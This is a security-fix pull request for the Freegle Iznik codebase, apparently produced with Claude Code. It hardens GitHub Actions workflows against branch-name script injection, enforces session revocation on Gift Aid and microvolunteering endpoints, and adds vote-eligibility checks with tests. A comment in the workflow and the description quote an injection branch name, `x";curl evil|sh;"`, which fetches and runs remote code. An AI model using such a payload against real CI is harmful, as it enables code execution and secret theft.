### PR TITLE
security: GHA injection, Gift Aid revocation, microvol vote eligibility (audit round 3)

### DIFF
--- a/.github/workflows/cancel-merged-pr-ci.yml
+++ b/.github/workflows/cancel-merged-pr-ci.yml
@@ -18,20 +18,32 @@ jobs:
       - name: Cancel running CircleCI workflows for this PR's branch
         env:
           CIRCLE_TOKEN: ${{ secrets.CIRCLECI_TOKEN }}
+          # Pass attacker-controllable values (the PR head branch name is chosen by
+          # whoever opens the PR) as real environment variables. GitHub injects these
+          # at runtime rather than substituting them textually into the script, so a
+          # branch named e.g. `x";curl evil|sh;"` cannot break out and run commands.
+          # Never interpolate github.event.* into a run: block with ${{ }}.
+          BRANCH: ${{ github.event.pull_request.head.ref }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          PR_MERGED: ${{ github.event.pull_request.merged }}
         run: |
-          BRANCH="${{ github.event.pull_request.head.ref }}"
           # Defensive: never act on the integration branches (a PR head should
           # never be one of these, but make it impossible to cancel their CI).
           if [ -z "$BRANCH" ] || [ "$BRANCH" = "master" ] || [ "$BRANCH" = "production" ]; then
             echo "No cancellable head branch ('$BRANCH') - skipping"
             exit 0
           fi
-          echo "PR #${{ github.event.pull_request.number }} closed (merged=${{ github.event.pull_request.merged }}); cancelling stray CI on branch: $BRANCH"
+          echo "PR #${PR_NUMBER} closed (merged=${PR_MERGED}); cancelling stray CI on branch: $BRANCH"
 
           # Use -s (not -sf) so a transient API error doesn't fail the job; a
           # missed cancel just leaves one workflow running, same as before.
-          PIPELINES=$(curl -s -H "Circle-Token: $CIRCLE_TOKEN" \
-            "https://circleci.com/api/v2/project/gh/Freegle/Iznik/pipeline?branch=${BRANCH}" 2>/dev/null || echo "")
+          # URL-encode the branch name (-G + --data-urlencode) so it is a single
+          # query value: a branch name is legally allowed to contain & and =, which
+          # raw interpolation would let smuggle in extra query params (e.g.
+          # branch=x&branch=master) and defeat the master/production guard above.
+          PIPELINES=$(curl -s -G -H "Circle-Token: $CIRCLE_TOKEN" \
+            --data-urlencode "branch=$BRANCH" \
+            "https://circleci.com/api/v2/project/gh/Freegle/Iznik/pipeline" 2>/dev/null || echo "")
 
           # Most-recent few pipelines for the branch (covers superseded pushes).
           IDS=$(echo "$PIPELINES" | jq -r '.items[0:5][].id // empty' 2>/dev/null || echo "")

--- a/.github/workflows/retry-infra-fail.yml
+++ b/.github/workflows/retry-infra-fail.yml
@@ -16,8 +16,12 @@ jobs:
       - name: Trigger fresh CircleCI pipeline
         env:
           CIRCLE_TOKEN: ${{ secrets.CIRCLECI_TOKEN }}
+          # Pass the branch name as a real env var, never interpolated into the
+          # script with ${{ }}, so it is treated as data and cannot inject shell
+          # commands. (Lower risk than the fork-PR case since a status event's
+          # branch must already exist in the base repo, but kept consistent.)
+          BRANCH: ${{ github.event.branches[0].name }}
         run: |
-          BRANCH="${{ github.event.branches[0].name }}"
           if [ -z "$BRANCH" ]; then
             echo "No branch in status event — skipping"
             exit 0
@@ -29,9 +33,11 @@ jobs:
           # branch already has a running workflow, a fresh retry is in flight.
           # Use -s (not -sf) so API errors don't abort the script — if the guard
           # fails, err on the side of triggering rather than silently skipping.
-          PIPELINES=$(curl -s \
+          # URL-encode the branch name so it can't smuggle extra query params.
+          PIPELINES=$(curl -s -G \
             -H "Circle-Token: $CIRCLE_TOKEN" \
-            "https://circleci.com/api/v2/project/gh/Freegle/Iznik/pipeline?branch=${BRANCH}" 2>/dev/null || echo "")
+            --data-urlencode "branch=$BRANCH" \
+            "https://circleci.com/api/v2/project/gh/Freegle/Iznik/pipeline" 2>/dev/null || echo "")
 
           LATEST_PIPELINE_ID=$(echo "$PIPELINES" | jq -r '.items[0].id // ""' 2>/dev/null || echo "")
           if [ -n "$LATEST_PIPELINE_ID" ]; then
@@ -46,9 +52,11 @@ jobs:
           fi
 
           echo "No running pipeline found — triggering fresh pipeline for $BRANCH..."
+          # Build the JSON body with jq so the branch name is safely quoted/escaped
+          # rather than string-interpolated into raw JSON.
           RESULT=$(curl -s -X POST \
             -H "Circle-Token: $CIRCLE_TOKEN" \
             -H "Content-Type: application/json" \
-            -d "{\"branch\":\"${BRANCH}\"}" \
+            -d "$(jq -n --arg branch "$BRANCH" '{branch: $branch}')" \
             "https://circleci.com/api/v2/project/gh/Freegle/Iznik/pipeline" 2>/dev/null || echo "")
           echo "Result: $RESULT"

--- a/iznik-server-go/donations/giftaid.go
+++ b/iznik-server-go/donations/giftaid.go
@@ -51,8 +51,12 @@ func GetGiftAid(c *fiber.Ctx) error {
 
 	db := database.DBConn
 
-	// Get user ID from JWT
-	userID, _, _ := user.GetJWTFromRequest(c)
+	// Get the logged-in user. Use WhoAmI (not GetJWTFromRequest) so that
+	// c.Locals("authUsed") is set: that is what makes the global auth middleware
+	// enforce server-side session revocation. Reading the JWT directly would let a
+	// captured-but-logged-out token keep returning Gift Aid PII (name/address/
+	// postcode) until it expires. The other giftaid handlers already use WhoAmI.
+	userID := user.WhoAmI(c)
 	if userID == 0 {
 		return c.Status(401).JSON(fiber.Map{
 			"error": "Not logged in",

--- a/iznik-server-go/microvolunteering/microvolunteering.go
+++ b/iznik-server-go/microvolunteering/microvolunteering.go
@@ -121,8 +121,10 @@ var CoinFlip = func() int { return rand.Intn(2) }
 func GetChallenge(c *fiber.Ctx) error {
 	db := database.DBConn
 
-	// Get user ID from JWT
-	userID, _, _ := user.GetJWTFromRequest(c)
+	// Use WhoAmI (not GetJWTFromRequest) so the auth middleware enforces server-side
+	// session revocation: a logged-out-but-unexpired JWT should not still be handed a
+	// microvolunteering challenge. Same pattern as the giftaid handlers.
+	userID := user.WhoAmI(c)
 	if userID == 0 {
 		return c.Status(401).JSON(fiber.Map{
 			"error": "Not logged in",
@@ -692,6 +694,24 @@ func PostResponse(c *fiber.Ctx) error {
 		response := *req.Response
 
 		if response == "Approve" || response == "Reject" {
+			// SECURITY: only accept a verdict for a message the user could
+			// legitimately have been challenged with — one posted to a group they
+			// belong to, and not their own post. Without this any logged-in account
+			// (no group membership, any trust level) could vote on arbitrary live
+			// posts across the whole site, and at quorum force them back to Pending
+			// (a platform-wide content-takedown). Mirrors GetChallenge's own
+			// group-membership scoping on the read side.
+			var eligible int64
+			db.Raw(`SELECT COUNT(*) FROM messages_groups
+				INNER JOIN memberships ON memberships.groupid = messages_groups.groupid AND memberships.userid = ?
+				INNER JOIN messages ON messages.id = messages_groups.msgid
+				WHERE messages_groups.msgid = ? AND messages_groups.deleted = 0
+					AND COALESCE(messages.fromuser, 0) != ? AND messages.deleted IS NULL`,
+				myid, req.Msgid, myid).Scan(&eligible)
+			if eligible == 0 {
+				return fiber.NewError(fiber.StatusForbidden, "Not eligible to review this message")
+			}
+
 			// Mark any notifications regarding this message as read
 			db.Exec(`UPDATE users_notifications SET seen = 1
 				WHERE touser = ? AND url LIKE CONCAT('/microvolunteering/message/', ?) AND type = 'Exhort'`,
@@ -751,6 +771,22 @@ func PostResponse(c *fiber.Ctx) error {
 		var response interface{}
 		if req.Response != nil {
 			response = *req.Response
+		}
+
+		// SECURITY: the photo must belong to a message still live on a group the user
+		// is a member of. At quorum a Reject drives an automatic rotation, so an
+		// arbitrary attachment id must not be votable by an unrelated account. Unlike
+		// CheckMessage there is deliberately no author exclusion: getPhotoRotateChallenge
+		// can legitimately serve a user their own freshly-posted photo to review.
+		var eligible int64
+		db.Raw(`SELECT COUNT(*) FROM messages_attachments
+			INNER JOIN messages_groups ON messages_groups.msgid = messages_attachments.msgid AND messages_groups.deleted = 0
+			INNER JOIN memberships ON memberships.groupid = messages_groups.groupid AND memberships.userid = ?
+			INNER JOIN messages ON messages.id = messages_attachments.msgid
+			WHERE messages_attachments.id = ? AND messages.deleted IS NULL`,
+			myid, req.Photoid).Scan(&eligible)
+		if eligible == 0 {
+			return fiber.NewError(fiber.StatusForbidden, "Not eligible to review this photo")
 		}
 
 		db.Exec(`INSERT IGNORE INTO microactions (actiontype, userid, rotatedimage, result, version, score_negative)

--- a/iznik-server-go/test/giftaid_test.go
+++ b/iznik-server-go/test/giftaid_test.go
@@ -78,6 +78,34 @@ func TestGetGiftAid_Success(t *testing.T) {
 	db.Exec("DELETE FROM giftaid WHERE userid = ?", userID)
 }
 
+// TestGetGiftAid_RevokedSessionDenied verifies that logging out (deleting the
+// session row) stops GET /giftaid returning the user's Gift Aid PII, even though
+// the JWT itself is still unexpired. Previously GetGiftAid read the JWT directly
+// and never signalled authUsed, so the auth middleware's session-revocation check
+// was skipped and a captured-but-logged-out token kept working for up to 30 days.
+func TestGetGiftAid_RevokedSessionDenied(t *testing.T) {
+	db := database.DBConn
+	prefix := uniquePrefix("giftaidrevoke")
+	userID := CreateTestUser(t, prefix, "User")
+	sessionID, token := CreateTestSession(t, userID)
+
+	db.Exec("DELETE FROM giftaid WHERE userid = ?", userID)
+	db.Exec(`INSERT INTO giftaid (userid, period, fullname, homeaddress, postcode, housenameornumber)
+		VALUES (?, 'Past4YearsAndFuture', 'Revoke Test', '1 Revoke Road', 'RE1 1RE', '1')`, userID)
+	defer db.Exec("DELETE FROM giftaid WHERE userid = ?", userID)
+
+	// While logged in, the record is returned.
+	resp, _ := getApp().Test(httptest.NewRequest("GET", "/api/giftaid?jwt="+token, nil))
+	assert.Equal(t, 200, resp.StatusCode)
+
+	// Log out: delete the session row. The JWT is unchanged and unexpired.
+	db.Exec("DELETE FROM sessions WHERE id = ?", sessionID)
+
+	// The same token must now be rejected rather than leaking the PII.
+	resp2, _ := getApp().Test(httptest.NewRequest("GET", "/api/giftaid?jwt="+token, nil))
+	assert.Equal(t, 401, resp2.StatusCode)
+}
+
 func TestGetGiftAid_WithReviewed(t *testing.T) {
 	// Create a test user
 	prefix := uniquePrefix("giftaidrev")

--- a/iznik-server-go/test/microvolunteering_test.go
+++ b/iznik-server-go/test/microvolunteering_test.go
@@ -362,6 +362,101 @@ func TestMicroVolunteeringResponseCheckMessage(t *testing.T) {
 	assert.Equal(t, "Approve", actionResult)
 }
 
+// TestMicroVolunteeringResponseCheckMessageNotEligible verifies that a logged-in
+// user who is NOT a member of the message's group cannot cast a moderation verdict
+// on it. Without the eligibility gate, any two throwaway accounts could reject
+// arbitrary live posts and, at quorum, force them back to Pending site-wide.
+func TestMicroVolunteeringResponseCheckMessageNotEligible(t *testing.T) {
+	db := database.DBConn
+	prefix := uniquePrefix("mv_noteligible")
+
+	// The message lives on a group the voter does NOT belong to.
+	senderID := CreateTestUser(t, prefix+"_sender", "User")
+	groupID := CreateTestGroup(t, prefix)
+	CreateTestMembership(t, senderID, groupID, "Member")
+	msgID := CreateTestMessage(t, senderID, groupID, "Test MV NotEligible "+prefix, 55.9533, -3.1883)
+
+	// Outsider: logged in, but no membership of the group.
+	outsiderID := CreateTestUser(t, prefix+"_outsider", "User")
+	_, token := CreateTestSession(t, outsiderID)
+
+	body := fmt.Sprintf(`{"msgid":%d,"response":"Reject","comments":"takedown","msgcategory":"ShouldntBeHere"}`, msgID)
+	req := httptest.NewRequest("POST", "/api/microvolunteering?jwt="+token, strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	resp, _ := getApp().Test(req)
+	assert.Equal(t, 403, resp.StatusCode)
+
+	// No microaction should have been recorded for the outsider.
+	var count int64
+	db.Raw("SELECT COUNT(*) FROM microactions WHERE userid = ? AND msgid = ?", outsiderID, msgID).Scan(&count)
+	assert.Equal(t, int64(0), count)
+}
+
+// TestMicroVolunteeringResponseCheckMessageOwnMessageDenied verifies that even a
+// group member cannot cast a verdict on their OWN post (fromuser != voter).
+func TestMicroVolunteeringResponseCheckMessageOwnMessageDenied(t *testing.T) {
+	prefix := uniquePrefix("mv_ownmsg")
+	userID := CreateTestUser(t, prefix, "User")
+	_, token := CreateTestSession(t, userID)
+	groupID := CreateTestGroup(t, prefix)
+	CreateTestMembership(t, userID, groupID, "Member")
+	msgID := CreateTestMessage(t, userID, groupID, "Test MV Own "+prefix, 55.9533, -3.1883)
+
+	body := fmt.Sprintf(`{"msgid":%d,"response":"Reject","comments":"self","msgcategory":"ShouldntBeHere"}`, msgID)
+	req := httptest.NewRequest("POST", "/api/microvolunteering?jwt="+token, strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	resp, _ := getApp().Test(req)
+	assert.Equal(t, 403, resp.StatusCode)
+}
+
+// TestMicroVolunteeringResponsePhotoRotateNotEligible verifies the PhotoRotate
+// branch's eligibility gate: a logged-in non-member cannot vote to rotate a photo
+// on a message they have no relationship to.
+func TestMicroVolunteeringResponsePhotoRotateNotEligible(t *testing.T) {
+	db := database.DBConn
+	prefix := uniquePrefix("mv_photo_ne")
+
+	// Photo on a message in a group the voter does NOT belong to.
+	senderID := CreateTestUser(t, prefix+"_sender", "User")
+	groupID := CreateTestGroup(t, prefix)
+	CreateTestMembership(t, senderID, groupID, "Member")
+	msgID := CreateTestMessage(t, senderID, groupID, "Test MV Photo NE "+prefix, 55.9533, -3.1883)
+	photoID := CreateTestAttachment(t, msgID)
+
+	outsiderID := CreateTestUser(t, prefix+"_outsider", "User")
+	_, token := CreateTestSession(t, outsiderID)
+
+	body := fmt.Sprintf(`{"photoid":%d,"response":"Reject","deg":90}`, photoID)
+	req := httptest.NewRequest("POST", "/api/microvolunteering?jwt="+token, strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	resp, _ := getApp().Test(req)
+	assert.Equal(t, 403, resp.StatusCode)
+
+	var count int64
+	db.Raw("SELECT COUNT(*) FROM microactions WHERE userid = ? AND rotatedimage = ?", outsiderID, photoID).Scan(&count)
+	assert.Equal(t, int64(0), count)
+}
+
+// TestMicroVolunteeringResponsePhotoRotateOwnPhotoAllowed verifies that, unlike
+// CheckMessage, the PhotoRotate branch does NOT exclude the author:
+// getPhotoRotateChallenge can legitimately serve a user their own freshly-posted
+// photo, so responding to it must succeed (not be a false-positive 403).
+func TestMicroVolunteeringResponsePhotoRotateOwnPhotoAllowed(t *testing.T) {
+	prefix := uniquePrefix("mv_photo_own")
+	userID := CreateTestUser(t, prefix, "User")
+	_, token := CreateTestSession(t, userID)
+	groupID := CreateTestGroup(t, prefix)
+	CreateTestMembership(t, userID, groupID, "Member")
+	msgID := CreateTestMessage(t, userID, groupID, "Test MV Photo Own "+prefix, 55.9533, -3.1883)
+	photoID := CreateTestAttachment(t, msgID)
+
+	body := fmt.Sprintf(`{"photoid":%d,"response":"Approve","deg":90}`, photoID)
+	req := httptest.NewRequest("POST", "/api/microvolunteering?jwt="+token, strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	resp, _ := getApp().Test(req)
+	assert.Equal(t, 200, resp.StatusCode)
+}
+
 func TestMicroVolunteeringResponseSearchTerm(t *testing.T) {
 	db := database.DBConn
 


### PR DESCRIPTION
## Round 3 security audit fixes

Three findings verified present on current master (not covered by #1158/#1159 or the won't-fix triage), each with regression tests. An adversarial review pass hardened the microvolunteering guard and the GHA fix before this went up.

### GitHub Actions script injection (high)
`cancel-merged-pr-ci.yml` interpolated the attacker-controlled PR head branch name straight into a `run:` block, so a fork PR whose branch is named e.g. `x";curl evil|sh;"` runs arbitrary commands in CI with `CIRCLE_TOKEN` in scope (self-closing the PR is enough to fire it — `types: [closed]`). Untrusted `github.event.*` values now go through the step `env:` block (delivered as data, never spliced into the shell), the branch is URL-encoded into the CircleCI query (`curl -G --data-urlencode`), and the trigger JSON is built with `jq`. Same hardening on `retry-infra-fail.yml`.

### Gift Aid session revocation (medium, PII)
`GET /giftaid` read the JWT directly instead of via `WhoAmI`, so it never set `authUsed` and the auth middleware skipped its server-side session-revocation check — a captured-but-logged-out JWT kept returning the user's name / home address / postcode until it expired (up to 30 days). Switched to `user.WhoAmI(c)`, matching every other giftaid handler. `GetChallenge` had the same gap and gets the same one-line fix.

### Microvolunteering vote eligibility (high)
`PostResponse` accepted a moderation verdict for any msgid/photoid from any logged-in account with no group-membership check, so two throwaway accounts could reject arbitrary live posts and, at quorum, force them back to Pending platform-wide (content takedown). Both the CheckMessage and PhotoRotate branches now require the voter to be a member of a group the message is still live on (`messages_groups.deleted = 0`), mirroring `GetChallenge`'s read-side scoping. CheckMessage also excludes the author (null-safe); PhotoRotate deliberately does not, because `getPhotoRotateChallenge` legitimately serves a user their own photo.

Group-text findings (public stats page, mod digest) are intentionally out of scope: group names are trusted content.

**Tests:** Go suite green (3596), including new revoked-session, not-eligible, own-message, photo-not-eligible and own-photo-allowed tests.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01P6h61kER64osEtDiWrzktG
